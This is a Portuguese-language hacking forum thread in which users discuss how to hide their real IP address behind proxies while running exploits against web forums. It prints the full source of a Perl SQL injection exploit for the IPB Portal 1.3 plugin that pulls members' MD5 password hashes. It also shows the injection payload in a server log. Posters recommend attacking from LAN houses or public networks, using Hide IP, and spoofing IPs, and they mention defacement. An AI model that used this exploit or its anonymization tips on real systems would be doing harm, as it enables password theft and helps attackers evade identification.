Andei vendo alguns vídeos de ataques com exploits em perl.
Algum de vocês sabem como é feita a configuração de uma espécie de proxy para esconder seu real ip em um ataque? sejá no código a adicionar no .pl...
bom naum tenho muito conhecimento nessa area. mais acho que usando um proxy anonimo da internet ou local mesmo ja deve reslver.. mais considero mais seguro fazer esse tipo de ação em redes publicas como numa lan house, ou outros do tipo, escolas de infomratica,etc..
Nos testes que fiz de anda adiantaram para camuflar o real IP configurando um proxy inclusive para todos os protocolos... ;)
Para vc poder ter acesso anonimo atráves de um Xpl em perl, vc pode se utilizar de técnicas como Ip Spoffing que serve para "mudar" o seu mac adress, porém vc pode querer acessar atráves de um proxy, para isso vc teria que entende como funciona o envio de requisição ao proxy e como ele te mandaria a resposta, para isso deveria saber como age a estrutura de um proxy (que é simplês)... E o que a linguagem perl proporciona para tal conexão....
Sem +...
depende do xpl, se for um pra webpages mesmo vc pode usar um simples proxy, em outras areas vc pode obter acesso a uma maquina servidora com proxy e utiliza-la para fazer o serviço,
t+
O exploit de exemplo é um feito para invision power board com o mod dragoran (alguma coisa assim)
branco já testei arrumar proxys em browser ou com programa e nenhum camufla o ataque direto com o exploit,
Acho que deve existir alguém código em perl para configurar proxy (depois dessa maratona de estudos que to passando) vou tentar aprender perl mas enquanto isso alguém ai pode me dar uma luz?
Seguinte cara como já disseram vc teria que criar uma rotina no exploit que conecta-se com o proxy,
e usar ip spofing acho q nao daria certo nao, porque ao mudar o ip, vc nao conseguia completar a conexão(se bem que me veio na cabeça umas gambiarras q talvez descem certo), o ip spofing daria certo se fosse conexão udp.
Sonics você entende de perl? poderia me passar uma rotina que se conecte com algum proxy? ou seria diferente em cada exploit? vlw
meu amigo, mesmo que eu te passe o algoritmo de proxy nao vai funcionar porque o proxy que vc esta usando provavelmente nao esta funcionando corretamente, instale o hide ip que vai conseguir, se o ataque for direcionado a porta 80 ( no caso o ipb ) o proxy vai funcionar sim, t+
Ok branco
1º - Com o ProxySwitcher selecionei o proxy e testei no meu próprio server.
2º - Tudo Certo no log...
"69.88.144.162 - - [13/Feb/2007:16:32:12 -0300] "GET / HTTP/1.0" 200 3453"
3º Agora no exploit faço um ataque no meu próprio server
perl ipb.pl 200.157.112.xxx /ipb/ 1
4º Vendo no log de conexões
200.157.112.xxx - - [13/Feb/2007:16:33:34 -0300] "GET /ipb/index.php?act=portal&site=-999%20UNION%20SELECT%20substring(password,1,10),substring(password,11,20),substring(password,21,30)%20FROM%20ibf_members%20Where%20id=1/* HTTP/1.1" 404 302
5º Apareceu o meu real ip
pode me mostrar o codigo de fonte do xpl ?
#!/usr/bin/perl
###########################################
#IPB Portal 1.3->Invision Power Board plugin
#Created By SkOd
#SED security Team , http://sed-team.be
###########################################
#google:
#"Portal 1.3 by Dragoran"
###########################################
use IO::Socket;
if (@ARGV < 3){
print q{
############################################################
# IPB Portal 1.3 SQL injection Get Hash Exploit #
# Tested on Invision Power Board 1.3.0 #
# created By SkOd. SED Security Team #
############################################################
ipbpro.pl [HOST] [PATH] [Target id]
ipbpro.pl www.host.com /forum/ 2
############################################################
};
exit;
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$id = $ARGV[2];
$serv =~ s/(http:\/\/)//eg;
$path = $dir.'index.php?act=portal&site=-999%20UNION%20SELECT%20substring(password,1,10),substring(password,11,20),substring(password,21,30)%20FROM%20ibf_members%20Where%20id='.$id.'/*';
$path2 = $dir.'index.php?act=portal&site=-999%20UNION%20SELECT%20substring(password,31,32),null,null%20FROM%20ibf_members%20Where%20id='.$id.'/*';
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-]Connect Failed\r\n";
print "[+]Connecting...\n";
print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "[+]Connected\n";
print "[+]User ID: $id\n";
print "[+]MD5 Hash: ";
while ($answer = <$socket>)
{
$answer =~ s/40%//eg;
$answer =~ s/30%//eg;
$answer =~ m/valign="top" width="(.*?)"/ && print "$1";
}
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-]Exploit Failed\r\n";
print $socket "GET $path2 HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
while ($answer = <$socket>)
{
$answer =~ s/40%//eg;
$answer =~ s/30%//eg;
$answer =~ m/valign="top" width="(.*?)"/ && print "$1";
}
Obrigado branco pela ajuda
o unico erro que possa ser pelo que vi no exploit é a falta de http:// na frente do host, teste ai e se nao der eu vo implementar o proxy no xpl pra vc poder usar, ate
Não deu certo continuou a mesma coisa ;)
Quote from: "Dragão Noturno"Não deu certo continuou a mesma coisa ;)
Mas é claro q nao ia dar certo, tem que ter a rotina do proxy no proprio exploit, e tipo eu nao manjo de perl ainda, mas o que eu posso fazer é tentar achar um code pronto de proxy em perl e vc adaptar no exploit, ou achar o algoritmo do mesmo.
flw
http://www.cis.upenn.edu/sdt/proxy.pl (http://www.cis.upenn.edu/sdt/proxy.pl)
http://www.adp-gmbh.ch/perl/proxy.html (http://www.adp-gmbh.ch/perl/proxy.html)
Opa vlw vou dar uma estudada e posto aqui o resultado vlw mesmo Sonics, branco...
lcs , não sei se vc faz deface ou o que , mais imagina sair de casa pra ir pruma lan house a cada vez que foi rodar um xpl ? IAHOEIAOHA ta loco fy
nunca tinha pensado muito nisso do proxy , mais acredito que pelo menos na cmd.exe do windows botando no internet explorer a configuração pra proxy local o cmd já estaria embutido , não custa fazer uns testes..
se não me engano no linux não é assim , tem que testar desse jeito que falei nos dois S.O